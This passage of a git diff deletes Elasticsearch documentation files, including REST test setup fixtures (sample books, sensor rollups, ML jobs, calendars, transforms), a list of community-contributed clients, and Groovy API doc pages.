"1987-04-23", "page_count": 471} - {"index":{"_id": "Pandora's Star"}} - {"name": "Pandora's Star", "author": "Peter F. 
Hamilton", "release_date": "2004-03-02", "page_count": 768} - {"index":{"_id": "Revelation Space"}} - {"name": "Revelation Space", "author": "Alastair Reynolds", "release_date": "2000-03-15", "page_count": 585} - {"index":{"_id": "A Fire Upon the Deep"}} - {"name": "A Fire Upon the Deep", "author": "Vernor Vinge", "release_date": "1992-06-01", "page_count": 613} - {"index":{"_id": "Ender's Game"}} - {"name": "Ender's Game", "author": "Orson Scott Card", "release_date": "1985-06-01", "page_count": 324} - {"index":{"_id": "1984"}} - {"name": "1984", "author": "George Orwell", "release_date": "1985-06-01", "page_count": 328} - {"index":{"_id": "Fahrenheit 451"}} - {"name": "Fahrenheit 451", "author": "Ray Bradbury", "release_date": "1953-10-15", "page_count": 227} - {"index":{"_id": "Brave New World"}} - {"name": "Brave New World", "author": "Aldous Huxley", "release_date": "1932-06-01", "page_count": 268} - {"index":{"_id": "Foundation"}} - {"name": "Foundation", "author": "Isaac Asimov", "release_date": "1951-06-01", "page_count": 224} - {"index":{"_id": "The Giver"}} - {"name": "The Giver", "author": "Lois Lowry", "release_date": "1993-04-26", "page_count": 208} - {"index":{"_id": "Slaughterhouse-Five"}} - {"name": "Slaughterhouse-Five", "author": "Kurt Vonnegut", "release_date": "1969-06-01", "page_count": 275} - {"index":{"_id": "The Hitchhiker's Guide to the Galaxy"}} - {"name": "The Hitchhiker's Guide to the Galaxy", "author": "Douglas Adams", "release_date": "1979-10-12", "page_count": 180} - {"index":{"_id": "Snow Crash"}} - {"name": "Snow Crash", "author": "Neal Stephenson", "release_date": "1992-06-01", "page_count": 470} - {"index":{"_id": "Neuromancer"}} - {"name": "Neuromancer", "author": "William Gibson", "release_date": "1984-07-01", "page_count": 271} - {"index":{"_id": "The Handmaid's Tale"}} - {"name": "The Handmaid's Tale", "author": "Margaret Atwood", "release_date": "1985-06-01", "page_count": 311} - {"index":{"_id": "Starship Troopers"}} - {"name": "Starship Troopers", "author": "Robert A. Heinlein", "release_date": "1959-12-01", "page_count": 335} - {"index":{"_id": "The Left Hand of Darkness"}} - {"name": "The Left Hand of Darkness", "author": "Ursula K. Le Guin", "release_date": "1969-06-01", "page_count": 304} - {"index":{"_id": "The Moon is a Harsh Mistress"}} - {"name": "The Moon is a Harsh Mistress", "author": "Robert A. 
Heinlein", "release_date": "1966-04-01", "page_count": 288} - -''' -buildRestTests.setups['sensor_rollup_job'] = ''' - - do: - indices.create: - index: sensor-1 - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - timestamp: - type: date - temperature: - type: long - voltage: - type: float - node: - type: keyword - - do: - raw: - method: PUT - path: _rollup/job/sensor - body: > - { - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size" :1000, - "groups" : { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": ["node"] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": ["min", "max", "sum"] - }, - { - "field": "voltage", - "metrics": ["avg"] - } - ] - } -''' -buildRestTests.setups['sensor_started_rollup_job'] = ''' - - do: - indices.create: - index: sensor-1 - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - timestamp: - type: date - temperature: - type: long - voltage: - type: float - node: - type: keyword - - - do: - bulk: - index: sensor-1 - refresh: true - body: | - {"index":{}} - {"timestamp": 1516729294000, "temperature": 200, "voltage": 5.2, "node": "a"} - {"index":{}} - {"timestamp": 1516642894000, "temperature": 201, "voltage": 5.8, "node": "b"} - {"index":{}} - {"timestamp": 1516556494000, "temperature": 202, "voltage": 5.1, "node": "a"} - {"index":{}} - {"timestamp": 1516470094000, "temperature": 198, "voltage": 5.6, "node": "b"} - {"index":{}} - {"timestamp": 1516383694000, "temperature": 200, "voltage": 4.2, "node": "c"} - {"index":{}} - {"timestamp": 1516297294000, "temperature": 202, "voltage": 4.0, "node": "c"} - - - do: - raw: - method: PUT - path: _rollup/job/sensor - body: > - { - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "* * * * * ?", - "page_size" :1000, - "groups" : { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": ["node"] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": ["min", "max", "sum"] - }, - { - "field": "voltage", - "metrics": ["avg"] - } - ] - } - - do: - raw: - method: POST - path: _rollup/job/sensor/_start -''' - -buildRestTests.setups['sensor_index'] = ''' - - do: - indices.create: - index: sensor-1 - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - timestamp: - type: date - temperature: - type: long - voltage: - type: float - node: - type: keyword - load: - type: double - net_in: - type: long - net_out: - type: long - hostname: - type: keyword - datacenter: - type: keyword -''' - -buildRestTests.setups['sensor_prefab_data'] = ''' - - do: - indices.create: - index: sensor-1 - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - timestamp: - type: date - temperature: - type: long - voltage: - type: float - node: - type: keyword - - do: - indices.create: - index: sensor_rollup - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - node.terms.value: - type: keyword - temperature.sum.value: - type: double - temperature.max.value: - type: double - temperature.min.value: - type: double - timestamp.date_histogram.time_zone: - type: keyword - timestamp.date_histogram.interval: - type: keyword - timestamp.date_histogram.timestamp: - type: date - timestamp.date_histogram._count: - type: long - voltage.avg.value: - 
type: double - voltage.avg._count: - type: long - _rollup.id: - type: keyword - _rollup.version: - type: long - _meta: - _rollup: - sensor: - cron: "* * * * * ?" - rollup_index: "sensor_rollup" - index_pattern: "sensor-*" - timeout: "20s" - page_size: 1000 - groups: - date_histogram: - delay: "7d" - field: "timestamp" - fixed_interval: "60m" - time_zone: "UTC" - terms: - fields: - - "node" - id: sensor - metrics: - - field: "temperature" - metrics: - - min - - max - - sum - - field: "voltage" - metrics: - - avg - - - do: - bulk: - index: sensor_rollup - refresh: true - body: | - {"index":{}} - {"node.terms.value":"b","temperature.sum.value":201.0,"temperature.max.value":201.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":201.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":5.800000190734863,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516640400000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - {"index":{}} - {"node.terms.value":"c","temperature.sum.value":200.0,"temperature.max.value":200.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":200.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":4.199999809265137,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516381200000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - {"index":{}} - {"node.terms.value":"a","temperature.sum.value":202.0,"temperature.max.value":202.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":202.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":5.099999904632568,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516554000000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - {"index":{}} - {"node.terms.value":"a","temperature.sum.value":200.0,"temperature.max.value":200.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":200.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":5.199999809265137,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516726800000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - {"index":{}} - {"node.terms.value":"b","temperature.sum.value":198.0,"temperature.max.value":198.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":198.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":5.599999904632568,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516467600000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - {"index":{}} - 
{"node.terms.value":"c","temperature.sum.value":202.0,"temperature.max.value":202.0,"timestamp.date_histogram.time_zone":"UTC","temperature.min.value":202.0,"timestamp.date_histogram._count":1,"timestamp.date_histogram.interval":"1h","_rollup.computed":["temperature.sum","temperature.min","voltage.avg","temperature.max","node.terms","timestamp.date_histogram"],"voltage.avg.value":4.0,"node.terms._count":1,"_rollup.version":1,"timestamp.date_histogram.timestamp":1516294800000,"voltage.avg._count":1.0,"_rollup.id":"sensor"} - -''' -buildRestTests.setups['sample_job'] = ''' - - do: - ml.put_job: - job_id: "sample_job" - body: > - { - "description" : "Very basic job", - "analysis_config" : { - "bucket_span":"10m", - "detectors" :[ - { - "function": "count" - } - ]}, - "data_description" : { - "time_field":"timestamp", - "time_format": "epoch_ms" - } - } -''' -buildRestTests.setups['farequote_index'] = ''' - - do: - indices.create: - index: farequote - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - metric: - properties: - time: - type: date - responsetime: - type: float - airline: - type: keyword - doc_count: - type: integer -''' -buildRestTests.setups['farequote_data'] = buildRestTests.setups['farequote_index'] + ''' - - do: - bulk: - index: farequote - type: metric - refresh: true - body: | - {"index": {"_id":"1"}} - {"airline":"JZA","responsetime":990.4628,"time":"2016-02-07T00:00:00+0000", "doc_count": 5} - {"index": {"_id":"2"}} - {"airline":"JBU","responsetime":877.5927,"time":"2016-02-07T00:00:00+0000", "doc_count": 23} - {"index": {"_id":"3"}} - {"airline":"KLM","responsetime":1355.4812,"time":"2016-02-07T00:00:00+0000", "doc_count": 42} -''' -buildRestTests.setups['farequote_job'] = buildRestTests.setups['farequote_data'] + ''' - - do: - ml.put_job: - job_id: "farequote" - body: > - { - "analysis_config": { - "bucket_span": "60m", - "detectors": [{ - "function": "mean", - "field_name": "responsetime", - "by_field_name": "airline" - }], - "summary_count_field_name": "doc_count" - }, - "data_description": { - "time_field": "time" - } - } -''' -buildRestTests.setups['farequote_datafeed'] = buildRestTests.setups['farequote_job'] + ''' - - do: - ml.put_datafeed: - datafeed_id: "datafeed-farequote" - body: > - { - "job_id":"farequote", - "indexes":"farequote" - } -''' -buildRestTests.setups['server_metrics_index'] = ''' - - do: - indices.create: - index: server-metrics - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - timestamp: - type: date - total: - type: long -''' -buildRestTests.setups['server_metrics_data'] = buildRestTests.setups['server_metrics_index'] + ''' - - do: - bulk: - index: server-metrics - type: metric - refresh: true - body: | - {"index": {"_id":"1177"}} - {"timestamp":"2017-03-23T13:00:00","total":40476} - {"index": {"_id":"1178"}} - {"timestamp":"2017-03-23T13:00:00","total":15287} - {"index": {"_id":"1179"}} - {"timestamp":"2017-03-23T13:00:00","total":-776} - {"index": {"_id":"1180"}} - {"timestamp":"2017-03-23T13:00:00","total":11366} - {"index": {"_id":"1181"}} - {"timestamp":"2017-03-23T13:00:00","total":3606} - {"index": {"_id":"1182"}} - {"timestamp":"2017-03-23T13:00:00","total":19006} - {"index": {"_id":"1183"}} - {"timestamp":"2017-03-23T13:00:00","total":38613} - {"index": {"_id":"1184"}} - {"timestamp":"2017-03-23T13:00:00","total":19516} - {"index": {"_id":"1185"}} - {"timestamp":"2017-03-23T13:00:00","total":-258} - {"index": {"_id":"1186"}} - 
{"timestamp":"2017-03-23T13:00:00","total":9551} - {"index": {"_id":"1187"}} - {"timestamp":"2017-03-23T13:00:00","total":11217} - {"index": {"_id":"1188"}} - {"timestamp":"2017-03-23T13:00:00","total":22557} - {"index": {"_id":"1189"}} - {"timestamp":"2017-03-23T13:00:00","total":40508} - {"index": {"_id":"1190"}} - {"timestamp":"2017-03-23T13:00:00","total":11887} - {"index": {"_id":"1191"}} - {"timestamp":"2017-03-23T13:00:00","total":31659} -''' -buildRestTests.setups['server_metrics_job'] = buildRestTests.setups['server_metrics_data'] + ''' - - do: - ml.put_job: - job_id: "total-requests" - body: > - { - "description" : "Total sum of requests", - "analysis_config" : { - "bucket_span":"10m", - "detectors" :[ - { - "detector_description": "Sum of total", - "function": "sum", - "field_name": "total" - } - ]}, - "data_description" : { - "time_field":"timestamp", - "time_format": "epoch_ms" - } - } -''' -buildRestTests.setups['server_metrics_job-raw'] = buildRestTests.setups['server_metrics_data'] + ''' - - do: - raw: - method: PUT - path: _ml/anomaly_detectors/total-requests - body: > - { - "description" : "Total sum of requests", - "analysis_config" : { - "bucket_span":"10m", - "detectors" :[ - { - "detector_description": "Sum of total", - "function": "sum", - "field_name": "total" - } - ]}, - "data_description" : { - "time_field":"timestamp", - "time_format": "epoch_ms" - } - } -''' -buildRestTests.setups['server_metrics_datafeed'] = buildRestTests.setups['server_metrics_job'] + ''' - - do: - ml.put_datafeed: - datafeed_id: "datafeed-total-requests" - body: > - { - "job_id":"total-requests", - "indexes":"server-metrics" - } -''' -buildRestTests.setups['server_metrics_datafeed-raw'] = buildRestTests.setups['server_metrics_job-raw'] + ''' - - do: - raw: - method: PUT - path: _ml/datafeeds/datafeed-total-requests - body: > - { - "job_id":"total-requests", - "indexes":"server-metrics" - } -''' -buildRestTests.setups['server_metrics_openjob'] = buildRestTests.setups['server_metrics_datafeed'] + ''' - - do: - ml.open_job: - job_id: "total-requests" -''' -buildRestTests.setups['server_metrics_openjob-raw'] = buildRestTests.setups['server_metrics_datafeed-raw'] + ''' - - do: - raw: - method: POST - path: _ml/anomaly_detectors/total-requests/_open -''' -buildRestTests.setups['server_metrics_startdf'] = buildRestTests.setups['server_metrics_openjob'] + ''' - - do: - ml.start_datafeed: - datafeed_id: "datafeed-total-requests" -''' -buildRestTests.setups['calendar_outages'] = ''' - - do: - ml.put_calendar: - calendar_id: "planned-outages" -''' -buildRestTests.setups['calendar_outages_addevent'] = buildRestTests.setups['calendar_outages'] + ''' - - do: - ml.post_calendar_events: - calendar_id: "planned-outages" - body: > - { "description": "event 1", "start_time": "2017-12-01T00:00:00Z", "end_time": "2017-12-02T00:00:00Z", "calendar_id": "planned-outages" } - - -''' -buildRestTests.setups['calendar_outages_openjob'] = buildRestTests.setups['server_metrics_openjob'] + ''' - - do: - ml.put_calendar: - calendar_id: "planned-outages" -''' -buildRestTests.setups['calendar_outages_addjob'] = buildRestTests.setups['server_metrics_openjob'] + ''' - - do: - ml.put_calendar: - calendar_id: "planned-outages" - body: > - { - "job_ids": ["total-requests"] - } -''' -buildRestTests.setups['calendar_outages_addevent'] = buildRestTests.setups['calendar_outages_addjob'] + ''' - - do: - ml.post_calendar_events: - calendar_id: "planned-outages" - body: > - { "events" : [ - { "description": "event 1", "start_time": 
"1513641600000", "end_time": "1513728000000"}, - { "description": "event 2", "start_time": "1513814400000", "end_time": "1513900800000"}, - { "description": "event 3", "start_time": "1514160000000", "end_time": "1514246400000"} - ]} -''' - -// used by median absolute deviation aggregation -buildRestTests.setups['reviews'] = ''' - - do: - indices.create: - index: reviews - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - product: - type: keyword - rating: - type: long - - do: - bulk: - index: reviews - refresh: true - body: | - {"index": {"_id": "1"}} - {"product": "widget-foo", "rating": 1} - {"index": {"_id": "2"}} - {"product": "widget-foo", "rating": 5} -''' -buildRestTests.setups['remote_cluster'] = buildRestTests.setups['host'] + ''' - - do: - cluster.put_settings: - body: - persistent: - cluster.remote.remote_cluster.seeds: $transport_host -''' - -buildRestTests.setups['remote_cluster_and_leader_index'] = buildRestTests.setups['remote_cluster'] + ''' - - do: - indices.create: - index: leader_index - body: - settings: - index.number_of_replicas: 0 - index.number_of_shards: 1 - index.soft_deletes.enabled: true -''' - -buildRestTests.setups['seats'] = ''' - - do: - indices.create: - index: seats - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - theatre: - type: keyword - cost: - type: long - row: - type: long - number: - type: long - sold: - type: boolean - - do: - bulk: - index: seats - refresh: true - body: | - {"index":{"_id": "1"}} - {"theatre": "Skyline", "cost": 37, "row": 1, "number": 7, "sold": false} - {"index":{"_id": "2"}} - {"theatre": "Graye", "cost": 30, "row": 3, "number": 5, "sold": false} - {"index":{"_id": "3"}} - {"theatre": "Graye", "cost": 33, "row": 2, "number": 6, "sold": false} - {"index":{"_id": "4"}} - {"theatre": "Skyline", "cost": 20, "row": 5, "number": 2, "sold": false}''' -buildRestTests.setups['kibana_sample_data_ecommerce'] = ''' - - do: - indices.create: - index: kibana_sample_data_ecommerce - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 -''' -buildRestTests.setups['add_timestamp_pipeline'] = ''' - - do: - ingest.put_pipeline: - id: "add_timestamp_pipeline" - body: > - { - "processors": [ - { - "set" : { - "field" : "@timestamp", - "value" : "{{_ingest.timestamp}}" - } - } - ] - } -''' -buildRestTests.setups['simple_kibana_continuous_pivot'] = buildRestTests.setups['kibana_sample_data_ecommerce'] + buildRestTests.setups['add_timestamp_pipeline'] + ''' - - do: - raw: - method: PUT - path: _transform/simple-kibana-ecomm-pivot - body: > - { - "source": { - "index": "kibana_sample_data_ecommerce", - "query": { - "term": { - "geoip.continent_name": { - "value": "Asia" - } - } - } - }, - "pivot": { - "group_by": { - "customer_id": { - "terms": { - "field": "customer_id" - } - } - }, - "aggregations": { - "max_price": { - "max": { - "field": "taxful_total_price" - } - } - } - }, - "description": "Maximum priced ecommerce data", - "dest": { - "index": "kibana_sample_data_ecommerce_transform", - "pipeline": "add_timestamp_pipeline" - }, - "frequency": "5m", - "sync": { - "time": { - "field": "order_date", - "delay": "60s" - } - } - } -''' -buildRestTests.setups['setup_logdata'] = ''' - - do: - indices.create: - index: logdata - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - grade: - type: byte - - do: - bulk: - index: logdata - refresh: true - body: | - {"index":{}} - {"grade": 100, "weight": 2} - {"index":{}} - 
{"grade": 50, "weight": 3} -''' -buildRestTests.setups['logdata_job'] = buildRestTests.setups['setup_logdata'] + ''' - - do: - ml.put_data_frame_analytics: - id: "loganalytics" - body: > - { - "source": { - "index": "logdata" - }, - "dest": { - "index": "logdata_out" - }, - "analysis": { - "outlier_detection": {} - } - } -''' -// Used by snapshot lifecycle management docs -buildRestTests.setups['setup-repository'] = ''' - - do: - snapshot.create_repository: - repository: my_repository - body: - type: fs - settings: - location: buildDir/cluster/shared/repo -''' - -// Fake sec logs data used by EQL search -buildRestTests.setups['atomic_red_regsvr32'] = ''' - - do: - indices.create: - index: my-index-000001 - body: - settings: - number_of_shards: 5 - number_of_routing_shards: 5 - - do: - bulk: - index: my-index-000001 - refresh: true - body: | -#atomic_red_data# -''' -/* Load the actual events only if we're going to use them. */ -File atomicRedRegsvr32File = new File("$projectDir/src/test/resources/normalized-T1117-AtomicRed-regsvr32.json") -buildRestTests.inputs.file(atomicRedRegsvr32File) -buildRestTests.doFirst { - String events = atomicRedRegsvr32File.getText('UTF-8') - // Indent like a yaml test needs - events = events.replaceAll('(?m)^', ' ') - buildRestTests.setups['atomic_red_regsvr32'] = - buildRestTests.setups['atomic_red_regsvr32'].replace('#atomic_red_data#', events) -} diff --git a/docs/community-clients/index.asciidoc b/docs/community-clients/index.asciidoc deleted file mode 100644 index 1527a2760ff..00000000000 --- a/docs/community-clients/index.asciidoc +++ /dev/null @@ -1,223 +0,0 @@ -= Community Contributed Clients - -[preface] -== Preface -:client: https://www.elastic.co/guide/en/elasticsearch/client - -[NOTE] -==== -This is a list of clients submitted by members of the Elastic community. -Elastic does not support or endorse these clients. - -If you'd like to add a new client to this list, please -https://github.com/elastic/elasticsearch/blob/master/CONTRIBUTING.md#contributing-code-and-documentation-changes[open a pull request]. -==== - -Besides the link:/guide[officially supported Elasticsearch clients], there are -a number of clients that have been contributed by the community for various languages: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[[b4j]] -== B4J -* https://www.b4x.com/android/forum/threads/server-jelasticsearch-search-and-text-analytics.73335/ - B4J client based on the official Java REST client. - -[[cpp]] -== C++ -* https://github.com/seznam/elasticlient[elasticlient]: simple library for simplified work with Elasticsearch in C++ - -[[clojure]] -== Clojure - -* https://github.com/mpenet/spandex[Spandex]: - Clojure client, based on the new official low level rest-client. - -* https://github.com/clojurewerkz/elastisch[Elastisch]: - Clojure client. - -[[coldfusion]] -== ColdFusion (CFML) - -* https://www.forgebox.io/view/cbelasticsearch[cbElasticSearch] - Native ColdFusion (CFML) support for the ColdBox MVC Platform which provides you with a fluent search interface for Elasticsearch, in addition to a CacheBox Cache provider and a Logbox Appender for logging. - -[[erlang]] -== Erlang - -* https://github.com/tsloughter/erlastic_search[erlastic_search]: - Erlang client using HTTP. - -* https://github.com/datahogs/tirexs[Tirexs]: - An https://github.com/elixir-lang/elixir[Elixir] based API/DSL, inspired by - https://github.com/karmi/tire[Tire]. 
Ready to use in pure Erlang - environment. - -* https://github.com/sashman/elasticsearch_elixir_bulk_processor[Elixir Bulk Processor]: - Dynamically configurable Elixir port of the [Bulk Processor](https://www.elastic.co/guide/en/elasticsearch/client/java-api/current/java-docs-bulk-processor.html). Implemented using GenStages to handle backpressure. - -[[go]] -== Go - -Also see the {client}/go-api/current/index.html[official Elasticsearch Go client]. - -* https://github.com/mattbaird/elastigo[elastigo]: - Go client. - -* https://github.com/olivere/elastic[elastic]: - Elasticsearch client for Google Go. - -* https://github.com/softctrl/elk[elk] - Golang lib for Elasticsearch client. - - -[[haskell]] -== Haskell -* https://github.com/bitemyapp/bloodhound[bloodhound]: - Haskell client and DSL. - - -[[java]] -== Java - -Also see the {client}/java-api/current/index.html[official Elasticsearch Java client]. - -* https://github.com/otto-de/flummi[Flummi]: - Java Rest client with comprehensive query DSL API -* https://github.com/searchbox-io/Jest[Jest]: - Java Rest client. - -[[javascript]] -== JavaScript - -Also see the {client}/javascript-api/current/index.html[official Elasticsearch JavaScript client]. - -[[kotlin]] -== Kotlin - -* https://github.com/mbuhot/eskotlin[ES Kotlin]: - Elasticsearch Query DSL for kotlin based on the {client}/java-api/current/index.html[official Elasticsearch Java client]. - -* https://github.com/jillesvangurp/es-kotlin-wrapper-client[ES Kotlin Wrapper Client]: - Kotlin extension functions and abstractions for the {client}/java-api/current/index.html[official Elasticsearch Highlevel Client]. Aims to reduce the amount of boilerplate needed to do searches, bulk indexing and other common things users do with the client. - -[[lua]] -== Lua - -* https://github.com/DhavalKapil/elasticsearch-lua[elasticsearch-lua]: - Lua client for Elasticsearch - -[[dotnet]] -== .NET - -Also see the {client}/net-api/current/index.html[official Elasticsearch .NET client]. - -[[perl]] -== Perl - -Also see the {client}/perl-api/current/index.html[official Elasticsearch Perl client]. - -* https://metacpan.org/pod/Elastijk[Elastijk]: A low level minimal HTTP client. - - -[[php]] -== PHP - -Also see the {client}/php-api/current/index.html[official Elasticsearch PHP client]. - -* https://github.com/ruflin/Elastica[Elastica]: - PHP client. - -* https://github.com/nervetattoo/elasticsearch[elasticsearch] PHP client. - -* https://github.com/madewithlove/elasticsearcher[elasticsearcher] Agnostic lightweight package on top of the Elasticsearch PHP client. Its main goal is to allow for easier structuring of queries and indices in your application. It does not want to hide or replace functionality of the Elasticsearch PHP client. - -[[python]] -== Python - -Also see the {client}/python-api/current/index.html[official Elasticsearch Python client]. - -[[r]] -== R - -* https://github.com/ropensci/elastic[elastic]: - A low-level R client for Elasticsearch. - -* https://github.com/ropensci/elasticdsl[elasticdsl]: - A high-level R DSL for Elasticsearch, wrapping the elastic R client. - -* https://github.com/UptakeOpenSource/uptasticsearch[uptasticsearch]: - An R client tailored to data science workflows. - -[[ruby]] -== Ruby - -Also see the {client}/ruby-api/current/index.html[official Elasticsearch Ruby client]. - -* https://github.com/printercu/elastics-rb[elastics]: - Tiny client with built-in zero-downtime migrations and ActiveRecord integration. 
- -* https://github.com/toptal/chewy[chewy]: - Chewy is an ODM and wrapper for the official Elasticsearch client - -* https://github.com/ankane/searchkick[Searchkick]: - Intelligent search made easy - -* https://github.com/artsy/estella[Estella]: - Make your Ruby models searchable - -[[rust]] -== Rust - -* https://github.com/benashford/rs-es[rs-es]: - A REST API client with a strongly-typed Query DSL. - -* https://github.com/elastic-rs/elastic[elastic]: - A modular REST API client that supports freeform queries. - -[[scala]] -== Scala - -* https://github.com/sksamuel/elastic4s[elastic4s]: - Scala DSL. - -* https://github.com/gphat/wabisabi[wabisabi]: - Asynchronous REST API Scala client. - -* https://github.com/workday/escalar[escalar]: - Type-safe Scala wrapper for the REST API. - -* https://github.com/SumoLogic/elasticsearch-client[elasticsearch-client]: - Scala DSL that uses the REST API. Akka and AWS helpers included. - -[[smalltalk]] -== Smalltalk - -* https://github.com/newapplesho/elasticsearch-smalltalk[elasticsearch-smalltalk] - - Pharo Smalltalk client for Elasticsearch - -[[vertx]] -== Vert.x - -* https://github.com/reactiverse/elasticsearch-client[elasticsearch-client]: - An Elasticsearch client for Eclipse Vert.x diff --git a/docs/groovy-api/anatomy.asciidoc b/docs/groovy-api/anatomy.asciidoc deleted file mode 100644 index ba7cf83bb00..00000000000 --- a/docs/groovy-api/anatomy.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[[anatomy]] -== API Anatomy - -Once a <> has been -obtained, all of Elasticsearch APIs can be executed on it. Each Groovy -API is exposed using three different mechanisms. - - -[[closure]] -=== Closure Request - -The first type is to simply provide the request as a Closure, which -automatically gets resolved into the respective request instance (for -the index API, its the `IndexRequest` class). The API returns a special -future, called `GActionFuture`. This is a groovier version of -Elasticsearch Java `ActionFuture` (in turn a nicer extension to Java own -`Future`) which allows to register listeners (closures) on it for -success and failures, as well as blocking for the response. For example: - -[source,groovy] --------------------------------------------------- -def indexR = client.index { - index "test" - type "_doc" - id "1" - source { - test = "value" - complex { - value1 = "value1" - value2 = "value2" - } - } -} - -println "Indexed $indexR.response.id into $indexR.response.index/$indexR.response.type" --------------------------------------------------- - -In the above example, calling `indexR.response` will simply block for -the response. We can also block for the response for a specific timeout: - -[source,groovy] --------------------------------------------------- -IndexResponse response = indexR.response "5s" // block for 5 seconds, same as: -response = indexR.response 5, TimeValue.SECONDS // --------------------------------------------------- - -We can also register closures that will be called on success and on -failure: - -[source,groovy] --------------------------------------------------- -indexR.success = {IndexResponse response -> - println "Indexed $response.id into $response.index/$response.type" -} -indexR.failure = {Throwable t -> - println "Failed to index: $t.message" -} --------------------------------------------------- - - -[[request]] -=== Request - -This option allows to pass the actual instance of the request (instead -of a closure) as a parameter. The rest is similar to the closure as a -parameter option (the `GActionFuture` handling). 
For example: - -[source,groovy] --------------------------------------------------- -def indexR = client.index (new IndexRequest( - index: "test", - type: "_doc", - id: "1", - source: { - test = "value" - complex { - value1 = "value1" - value2 = "value2" - } - })) - -println "Indexed $indexR.response.id into $indexR.response.index/$indexR.response.type" --------------------------------------------------- - - -[[java-like]] -=== Java Like - -The last option is to provide an actual instance of the API request, and -an `ActionListener` for the callback. This is exactly like the Java API -with the added `gexecute` which returns the `GActionFuture`: - -[source,groovy] --------------------------------------------------- -def indexR = node.client.prepareIndex("test", "_doc", "1").setSource({ - test = "value" - complex { - value1 = "value1" - value2 = "value2" - } -}).gexecute() --------------------------------------------------- diff --git a/docs/groovy-api/client.asciidoc b/docs/groovy-api/client.asciidoc deleted file mode 100644 index c3c89e71bc5..00000000000 --- a/docs/groovy-api/client.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[client]] -== Client - -Obtaining an Elasticsearch Groovy `GClient` (a `GClient` is a simple -wrapper on top of the Java `Client`) is simple. The most common way to -get a client is by starting an embedded `Node` which acts as a node -within the cluster. - - -[[node-client]] -=== Node Client - -A Node based client is the simplest form to get a `GClient` to start -executing operations against Elasticsearch. - -[source,groovy] --------------------------------------------------- -import org.elasticsearch.groovy.client.GClient -import org.elasticsearch.groovy.node.GNode -import static org.elasticsearch.groovy.node.GNodeBuilder.nodeBuilder - -// on startup - -GNode node = nodeBuilder().node(); -GClient client = node.client(); - -// on shutdown - -node.close(); --------------------------------------------------- - -Since Elasticsearch allows to configure it using JSON based settings, -the configuration itself can be done using a closure that represent the -JSON: - -[source,groovy] --------------------------------------------------- -import org.elasticsearch.groovy.node.GNode -import org.elasticsearch.groovy.node.GNodeBuilder -import static org.elasticsearch.groovy.node.GNodeBuilder.* - -// on startup - -GNodeBuilder nodeBuilder = nodeBuilder(); -nodeBuilder.settings { - node { - client = true - } - cluster { - name = "test" - } -} - -GNode node = nodeBuilder.node() - -// on shutdown - -node.stop().close() --------------------------------------------------- diff --git a/docs/groovy-api/delete.asciidoc b/docs/groovy-api/delete.asciidoc deleted file mode 100644 index 3d654782004..00000000000 --- a/docs/groovy-api/delete.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[[delete]] -== Delete API - -The delete API is very similar to the -// {javaclient}/java-docs-delete.html[] -Java delete API, here is an -example: - -[source,groovy] --------------------------------------------------- -def deleteF = node.client.delete { - index "test" - type "_doc" - id "1" -} --------------------------------------------------- diff --git a/docs/groovy-api/get.asciidoc b/docs/groovy-api/get.asciidoc deleted file mode 100644 index 2cac8429c3e..00000000000 --- a/docs/groovy-api/get.asciidoc +++ 